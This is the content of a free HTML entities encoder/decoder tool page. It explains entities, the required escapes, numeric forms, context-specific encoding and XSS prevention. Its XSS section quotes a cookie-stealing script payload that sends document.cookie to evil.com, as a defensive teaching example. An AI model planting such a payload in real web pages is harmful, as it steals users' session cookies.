Free HTML Entities Encoder & Decoder
Encode special characters as HTML entities or decode HTML entities back to text.
What are HTML entities and why do they exist?
HTML entities are special sequences of characters used to represent characters that either have special meaning in HTML or cannot be reliably typed in all environments. Every entity starts with an ampersand (&) and ends with a semicolon (;).
HTML parsers use certain characters to define markup: < opens a tag, > closes one, and & begins an entity reference itself. If you want to display the literal text 2 < 5 in a browser, you cannot write the raw less-than sign — the parser would try to open a tag. Entities solve this by providing a safe, unambiguous representation.
Beyond required characters, entities also allow you to include characters that may be difficult to type on a keyboard or that might be stripped or corrupted by text editors and transmission protocols. The copyright symbol ©, the em dash —, and non-breaking spaces are common examples of characters that are best represented as entities.
Required entities vs optional ones
Not all HTML encoding is mandatory. Understanding which characters must be encoded and which are optional helps you avoid unnecessary verbosity while maintaining correctness.
Must be encoded:
- & → &amp; (always)
- < → &lt; (in content)
- > → &gt; (in content)
- " → &quot; (in double-quoted attrs)
- ' → &#39; (in single-quoted attrs)
Optional:
- © → &copy; (readable alternative)
- — → &mdash; (semantic clarity)
- Non-breaking space → &nbsp;
- € → &euro; (safe across encodings)
- Any Unicode above U+007F in ASCII files
If your HTML file is saved as UTF-8 (the universal standard since HTML5), you can include any Unicode character directly without encoding. The main reason to encode non-ASCII characters is legacy compatibility — older systems, email clients, and some templating engines may mangle Unicode. For modern web applications using UTF-8 consistently, only the five required characters need encoding.
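As a minimal sketch of encoding only the five required characters, the function below maps each one to its entity and leaves everything else (including non-ASCII characters such as ©) untouched. The names `HTML_ESCAPES` and `escapeHtml` are hypothetical, chosen for illustration.

```javascript
// Hypothetical lookup table: the five characters with special meaning in HTML.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(text) {
  // One pass over the input, so an ampersand produced by a replacement
  // is never escaped a second time.
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

console.log(escapeHtml('2 < 5 & "quotes" © 2024'));
// 2 &lt; 5 &amp; &quot;quotes&quot; © 2024
```

Doing the replacement in a single pass avoids the ordering pitfall of chained replacements, where escaping & last would corrupt entities produced by earlier steps.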
Named vs numeric (decimal) vs numeric (hex) entities
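HTML supports three forms of character reference. The two numeric forms work for any character, the named form only for characters that have a name, and every available form produces identical output in the browser: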
- Named, &name; (example: &lt; → <): uses a human-readable name defined in the HTML specification. Limited to characters that have been assigned names; not every Unicode character has one.
- Decimal, &#number; (example: &#60; → <): uses the decimal Unicode code point. Works for any Unicode character (code points 0–1,114,111). No memorization needed: look up the code point and use it.
- Hexadecimal, &#xHex; (example: &#x3C; → <): uses the hexadecimal Unicode code point with an x prefix. Preferred by developers familiar with Unicode, since Unicode documentation uses hex (U+003C = 0x3C).
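The two numeric forms can be derived mechanically from a character's code point. The sketch below shows one way to do that and to decode them back; `toNumericReferences` and `decodeNumericReferences` are hypothetical helpers, and the decoder deliberately ignores named entities and the extra error-handling rules a real HTML parser applies.

```javascript
// Hypothetical helper: build the decimal and hex references for the
// first code point of the given string.
function toNumericReferences(char) {
  const codePoint = char.codePointAt(0);
  return {
    decimal: `&#${codePoint};`,
    hex: `&#x${codePoint.toString(16).toUpperCase()};`,
  };
}

// Hypothetical helper: decode decimal and hex references only.
function decodeNumericReferences(text) {
  return text.replace(/&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));/g, (match, hex, dec) => {
    const codePoint = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    // Values beyond the Unicode range are left as written instead of throwing.
    return codePoint <= 0x10ffff ? String.fromCodePoint(codePoint) : match;
  });
}

console.log(toNumericReferences("<")); // { decimal: '&#60;', hex: '&#x3C;' }
console.log(decodeNumericReferences("&#60; and &#x3C;")); // < and <
```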
XSS prevention: why HTML encoding is a security-critical practice
Cross-Site Scripting (XSS) has long featured in the OWASP Top 10 list of critical web security risks, first as its own category and, since the 2021 edition, as part of the Injection category. It occurs when an attacker injects malicious client-side scripts into a web page that other users view. The attack works because the browser cannot distinguish between the page's intended JavaScript and injected code; it executes both.
The classic attack scenario: a comment field allows user input. An attacker submits <script>fetch('evil.com?c='+document.cookie)</script>. If the application renders this raw HTML, every user who views the comment page has their session cookie exfiltrated.
// DANGEROUS: renders user input as HTML
document.getElementById('comment').innerHTML = userInput;

// SAFE: inserts user input as a text node, so it is never parsed as HTML
const container = document.getElementById('comment');
const el = document.createElement('div');
el.appendChild(document.createTextNode(userInput));
container.appendChild(el);

Modern frameworks like React, Vue, and Angular HTML-encode content by default. React's JSX uses dangerouslySetInnerHTML as an explicit opt-in to raw HTML rendering, and the name is intentional. If you bypass framework defaults to render raw HTML, you must encode user input manually.
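When markup has to be assembled as a string, one way to encode manually is a tagged template that escapes every interpolated value while trusting only the literal parts. This is a sketch under that assumption, not a replacement for a framework or a vetted sanitizer; `escapeHtml` and `safeHtml` are hypothetical names.

```javascript
// Hypothetical helper: & is replaced first so later entities are not re-escaped.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Tagged template: literal parts pass through, interpolated values are escaped.
function safeHtml(strings, ...values) {
  return strings.reduce(
    (out, part, i) => out + part + (i < values.length ? escapeHtml(values[i]) : ""),
    ""
  );
}

const userInput = "<script>fetch('evil.com?c='+document.cookie)</script>";
const markup = safeHtml`<p class="comment">${userInput}</p>`;

console.log(markup);
// <p class="comment">&lt;script&gt;fetch(&#39;evil.com?c=&#39;+document.cookie)&lt;/script&gt;</p>
```

The escaped result is safe to place in element content or a quoted attribute value; it is not sufficient inside a script block or a URL.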
Complete reference of the most important HTML entities
| Character | Named Entity | Decimal | Hex | Category |
|---|---|---|---|---|
| & | &amp; | &#38; | &#x26; | Required |
| < | &lt; | &#60; | &#x3C; | Required |
| > | &gt; | &#62; | &#x3E; | Required |
| " | &quot; | &#34; | &#x22; | Required in attrs |
| ' | &apos; | &#39; | &#x27; | Required in attrs |
| (non-breaking space) | &nbsp; | &#160; | &#xA0; | Whitespace |
| © | &copy; | &#169; | &#xA9; | Legal |
| ® | &reg; | &#174; | &#xAE; | Legal |
| ™ | &trade; | &#8482; | &#x2122; | Legal |
| — | &mdash; | &#8212; | &#x2014; | Typography |
| – | &ndash; | &#8211; | &#x2013; | Typography |
| … | &hellip; | &#8230; | &#x2026; | Typography |
| € | &euro; | &#8364; | &#x20AC; | Currency |
| £ | &pound; | &#163; | &#xA3; | Currency |
Encoding in different contexts
In element content, encode &, <, and > at minimum. These three prevent tag injection and entity-sequence injection.
<p>&lt;script&gt; is not a real tag here</p>
In double-quoted attribute values, encode & and " in addition to < and >. A literal double quote would close the attribute.
<input value="5 &gt; 3 &amp;&amp; x &lt; 10">
In single-quoted attribute values, encode & and ' (as &#39; or &apos;). Single-quoted attributes need the apostrophe escaped instead of the double quote.
<input value='O&#39;Brien'>
Never embed raw user data in JavaScript script blocks using only HTML encoding. HTML encoding alone does not make a value safe inside a JavaScript string; the value also needs JavaScript string escaping for that context. Prefer data attributes or JSON instead.
<!-- UNSAFE: -->
<script>var name = "<?= htmlspecialchars($name) ?>";</script>
HTML encoding is separate from URL encoding. Use encodeURIComponent() for URL parameter values. In the link below, %20 is URL encoding for a space inside a value, while &amp; is the HTML entity for the & that separates parameters, not a URL-encoded value.
<a href="?q=hello%20world&amp;lang=en">Search</a>
Character encoding: UTF-8, ASCII, and how entities relate
ASCII (American Standard Code for Information Interchange) defines 128 characters using 7 bits: the basic Latin alphabet, digits, punctuation, and control characters. HTML was originally designed to work within ASCII, which is why characters outside ASCII needed entity references — the underlying encoding might not support them.
UTF-8 is a variable-length encoding that covers all 1,114,112 Unicode code points. It uses 1 byte for ASCII characters (backward compatible) and up to 4 bytes for emoji and rare scripts. HTML5 mandates UTF-8 as the document encoding and modern servers declare it via Content-Type: text/html; charset=utf-8.
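The variable width is easy to observe. The sketch below assumes a runtime that provides the standard `TextEncoder` global (current browsers and Node.js do); `utf8ByteLength` is a hypothetical helper name.

```javascript
// TextEncoder always produces UTF-8 bytes.
const encoder = new TextEncoder();

function utf8ByteLength(text) {
  return encoder.encode(text).length;
}

for (const ch of ["A", "©", "€", "😀"]) {
  const codePoint = ch.codePointAt(0).toString(16).toUpperCase().padStart(4, "0");
  console.log(`U+${codePoint} ${ch}: ${utf8ByteLength(ch)} byte(s)`);
}
// U+0041 A: 1 byte(s)
// U+00A9 ©: 2 byte(s)
// U+20AC €: 3 byte(s)
// U+1F600 😀: 4 byte(s)
```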
With UTF-8 declared, you can include any Unicode character — emoji, Chinese characters, mathematical symbols — directly in your HTML without entities. The only characters that still require entities are the five that have special HTML meaning (&, <, >, ", '). HTML entities for other characters (©, €, —) are now purely a readability preference, not a necessity.
FAQ
Common questions
What are HTML entities?
HTML entities are sequences of characters used to represent special characters in HTML markup. They begin with an ampersand (&) and end with a semicolon (;). For example, &lt; represents the less-than sign <. Entities are necessary when you need to display characters that HTML would otherwise interpret as markup, such as < and >.
Which HTML characters must be escaped?
Three characters are required to be escaped in HTML content: & (ampersand → &amp;), < (less-than → &lt;), and > (greater-than → &gt;). Inside HTML attribute values, you also need to escape the quote character being used: " (→ &quot;) in double-quoted attributes and ' (→ &#39;) in single-quoted attributes. Forgetting to escape these is the root cause of most HTML injection vulnerabilities.
What is the difference between named and numeric HTML entities?
Named entities use a descriptive name: &amp; for &, &lt; for <, &copy; for ©. Numeric entities use either decimal (&#38; for &) or hexadecimal (&#x26; for &) Unicode code points. Named entities are more readable; numeric entities work for any Unicode character, including those without a named entity. All three forms produce identical output.
Why do I need to encode HTML entities?
Encoding prevents HTML injection and XSS (Cross-Site Scripting) attacks. If a user inputs <script>alert(1)</script> and your application renders it without encoding, the browser executes the script. By encoding < as &lt; and > as &gt;, the browser displays the literal characters instead of interpreting them as tags. This is one of the most critical security practices in web development.
What is &nbsp;?
&nbsp; (non-breaking space) is a whitespace character that prevents line breaks. Unlike a regular space, it keeps the words on either side together, so they will not wrap onto separate lines. It is also not collapsed by HTML's whitespace normalization. Use &nbsp; between values that should stay together: "10 km", "Dr. Smith", "Fig. 1".
What is the difference between &lt; and &#60;?
&lt; is a named entity for the less-than sign <. &#60; is the decimal numeric entity for the same character (Unicode code point 60). &#x3C; is the hexadecimal equivalent. All three produce exactly the same character in the browser. Named entities are preferred for readability, but numeric entities are universal for any Unicode code point.
Do I need to encode special characters in HTML attributes?
Yes. Inside attribute values, you must encode the quote delimiter. In double-quoted attributes, encode " as &quot;. In single-quoted attributes, encode ' as &#39; or &apos;. You should also always encode & as &amp; inside attribute values, especially in URLs (href, src, action). Failure to do so can break attribute parsing or enable injection attacks.
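For URL-bearing attributes, the two encodings are applied in sequence: URL-encode each parameter value first, then HTML-encode the finished URL for the attribute. A minimal sketch, with `escapeAttribute` and `searchLink` as hypothetical names and the q and lang parameters chosen only for illustration:

```javascript
// Hypothetical helper: HTML-encode a value for use inside a quoted attribute.
function escapeAttribute(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function searchLink(query, lang) {
  // Step 1: URL-encode each parameter value.
  const url = `?q=${encodeURIComponent(query)}&lang=${encodeURIComponent(lang)}`;
  // Step 2: HTML-encode the whole URL before placing it in the attribute.
  return `<a href="${escapeAttribute(url)}">Search</a>`;
}

console.log(searchLink("hello world", "en"));
// <a href="?q=hello%20world&amp;lang=en">Search</a>
```

Note that encodeURIComponent() leaves the apostrophe unencoded, which is one reason the second step still escapes quote characters.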
What is XSS and how does HTML encoding prevent it?
XSS (Cross-Site Scripting) is an attack where malicious scripts are injected into web pages viewed by other users. The most common vector is rendering user input as raw HTML. HTML encoding converts dangerous characters (<, >, &, ", ') into their entity equivalents, so the browser displays them as text instead of parsing them as HTML. Always encode any data from external sources before rendering it in HTML.